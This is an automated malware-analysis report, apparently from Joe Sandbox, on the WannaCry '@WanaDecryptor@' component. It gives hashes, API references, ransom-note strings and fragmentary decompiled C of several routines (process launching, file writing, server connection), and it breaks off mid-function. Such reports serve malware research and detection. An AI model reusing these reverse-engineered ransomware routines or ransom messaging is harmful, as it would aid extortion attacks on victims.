                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                                      • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                                      • API String ID: 139182656-2046724789
                                                      • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                                      • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}









                                                      0x00404090
                                                      0x00404092
                                                      0x00404097
                                                      0x0040409d
                                                      0x0040409e
                                                      0x004040a5
                                                      0x004040a9
                                                      0x004040ac
                                                      0x004040b0
                                                      0x004040b5
                                                      0x004040c2
                                                      0x004040c6
                                                      0x004040ce
                                                      0x004040d5
                                                      0x004040da
                                                      0x004040dd
                                                      0x004040e4
                                                      0x004040eb
                                                      0x004040f0
                                                      0x004040f6
                                                      0x004040fb
                                                      0x004040fe
                                                      0x0040410f
                                                      0x00404112
                                                      0x00404115
                                                      0x00404120
                                                      0x00404129
                                                      0x0040412c
                                                      0x00404139
                                                      0x00404143

                                                      APIs
                                                      • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                      • #860.MFC42(00421798), ref: 004040F6
                                                      • #858.MFC42(00000000,00421798), ref: 004040FE
                                                      • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540CursorLoad$#567#858#860
                                                      • String ID: 0ZA
                                                      • API String ID: 2440951079-2594568282
                                                      • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                                      • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}














                                                      0x00407cb0
                                                      0x00407cb2
                                                      0x00407cbd
                                                      0x00407cbe
                                                      0x00407cc5
                                                      0x00407cd1
                                                      0x00407cda
                                                      0x00407ce5
                                                      0x00407cea
                                                      0x00407cf5
                                                      0x00407cfc
                                                      0x00407d07
                                                      0x00407d12
                                                      0x00407d1a
                                                      0x00407d26
                                                      0x00407d31
                                                      0x00407d35
                                                      0x00407d47
                                                      0x00407d4f
                                                      0x00407d5b
                                                      0x00407d66
                                                      0x00407d6e
                                                      0x00407d77
                                                      0x00407d7f
                                                      0x00407d88
                                                      0x00407d93
                                                      0x00407d9f
                                                      0x00407dac

                                                      APIs
                                                        • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      • #2514.MFC42 ref: 00407CE5
                                                      • #2414.MFC42 ref: 00407D1A
                                                      • #2414.MFC42 ref: 00407D4F
                                                      • #616.MFC42 ref: 00407D6E
                                                      • #693.MFC42 ref: 00407D7F
                                                      • #641.MFC42 ref: 00407D93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#567$#2514#324#616#641#693
                                                      • String ID: [A$[A
                                                      • API String ID: 3779294304-353784214
                                                      • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                                      • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195windowfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				intOrPtr* _t68;
				signed int _t76;
				struct HWND__* _t92;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t118;
				intOrPtr* _t120;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_t68 =  *0x422210; // 0xab4238
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_t113 =  *0x422210; // 0xab4238
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							_t114 =  *0x422210; // 0xab4238
							 *((intOrPtr*)( *_t114 + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							_t118 =  *0x422210; // 0xab4238
							 *((intOrPtr*)( *_t118 + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						_t120 =  *0x422210; // 0xab4238
						 *((intOrPtr*)( *_t120 + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}




































                                                      0x0040c240
                                                      0x0040c248
                                                      0x0040c253
                                                      0x0040c25a
                                                      0x0040c260
                                                      0x0040c26c
                                                      0x0040c283
                                                      0x0040c28e
                                                      0x0040c293
                                                      0x0040c296
                                                      0x0040c29b
                                                      0x0040c2a0
                                                      0x0040c2c8
                                                      0x0040c2d7
                                                      0x0040c2e3
                                                      0x0040c2e3
                                                      0x0040c2ec
                                                      0x0040c2ee
                                                      0x0040c2f3
                                                      0x0040c303
                                                      0x0040c307
                                                      0x0040c309
                                                      0x0040c30e
                                                      0x0040c31f
                                                      0x0040c330
                                                      0x0040c340
                                                      0x0040c342
                                                      0x0040c347
                                                      0x0040c34b
                                                      0x0040c350
                                                      0x0040c35b
                                                      0x0040c35d
                                                      0x0040c362
                                                      0x0040c366
                                                      0x0040c372
                                                      0x0040c373
                                                      0x0040c378
                                                      0x0040c37d
                                                      0x0040c382
                                                      0x0040c38f
                                                      0x0040c39f
                                                      0x0040c3a0
                                                      0x0040c3a7
                                                      0x0040c3e2
                                                      0x0040c3ee
                                                      0x0040c3ee
                                                      0x0040c3f0
                                                      0x0040c3fa
                                                      0x0040c402
                                                      0x0040c403
                                                      0x0040c411
                                                      0x0040c417
                                                      0x0040c452
                                                      0x0040c458
                                                      0x0040c45c
                                                      0x0040c470
                                                      0x0040c472
                                                      0x0040c477
                                                      0x0040c489
                                                      0x0040c48f
                                                      0x0040c494
                                                      0x0040c497
                                                      0x0040c497
                                                      0x0040c477
                                                      0x0040c45c
                                                      0x0040c49e
                                                      0x0040c4a9
                                                      0x0040c4a9
                                                      0x0040c4ab
                                                      0x0040c4b3
                                                      0x0040c4b6
                                                      0x0040c4c1
                                                      0x0040c4c5
                                                      0x0040c4ca
                                                      0x0040c419
                                                      0x0040c41b
                                                      0x0040c427
                                                      0x0040c427
                                                      0x0040c429
                                                      0x0040c431
                                                      0x0040c438
                                                      0x0040c448
                                                      0x0040c448
                                                      0x00000000
                                                      0x0040c3a9
                                                      0x0040c3ab
                                                      0x0040c3b7
                                                      0x0040c3b7
                                                      0x0040c3b9
                                                      0x0040c3c1
                                                      0x0040c3c8
                                                      0x0040c3d8
                                                      0x0040c4cc
                                                      0x0040c4d7
                                                      0x0040c4e4
                                                      0x0040c4e4
                                                      0x0040c3a7
                                                      0x0040c2a2
                                                      0x0040c2ab
                                                      0x0040c2b6
                                                      0x0040c2b6
                                                      0x0040c2bc
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                                      • fopen.MSVCRT ref: 0040C46B
                                                      • fwrite.MSVCRT ref: 0040C489
                                                      • fclose.MSVCRT ref: 0040C48F
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823fclosefopenfwrite
                                                      • String ID:
                                                      • API String ID: 1132507536-0
                                                      • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                                      • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68processsynchronizationCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}








                                                      0x00401aa0
                                                      0x00401aa8
                                                      0x00401ab5
                                                      0x00401abb
                                                      0x00401ac5
                                                      0x00401ad2
                                                      0x00401ad6
                                                      0x00401ade
                                                      0x00401aeb
                                                      0x00401b4c
                                                      0x00401aed
                                                      0x00401aed
                                                      0x00401af3
                                                      0x00401b03
                                                      0x00401b0c
                                                      0x00401b0c
                                                      0x00401b12
                                                      0x00401b18
                                                      0x00401b20
                                                      0x00401b20
                                                      0x00401b18
                                                      0x00401b31
                                                      0x00401b38
                                                      0x00401b44
                                                      0x00401b44

                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                                      • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                      • String ID: D
                                                      • API String ID: 786732093-2746444292
                                                      • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                                      • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00401140() {
				intOrPtr _v4;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
				}
				return 1;
			}








                                                      0x00401143
                                                      0x00401145
                                                      0x00401160
                                                      0x00401162
                                                      0x00401175
                                                      0x00401177
                                                      0x00401178
                                                      0x00401184
                                                      0x0040118d
                                                      0x00401194
                                                      0x004011a9
                                                      0x004011b3
                                                      0x004011c1
                                                      0x004011d7
                                                      0x004011d7
                                                      0x004011e5

                                                      APIs
                                                      • #4710.MFC42 ref: 00401145
                                                      • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                                      • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                                      • #537.MFC42(Connecting to server...), ref: 0040118D
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                                      • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                                      Strings
                                                      • Connecting to server..., xrefs: 00401188
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                                      • String ID: Connecting to server...
                                                      • API String ID: 3305248171-1849848738
                                                      • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                                      • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 2613176527-0
                                                      • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                                      • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
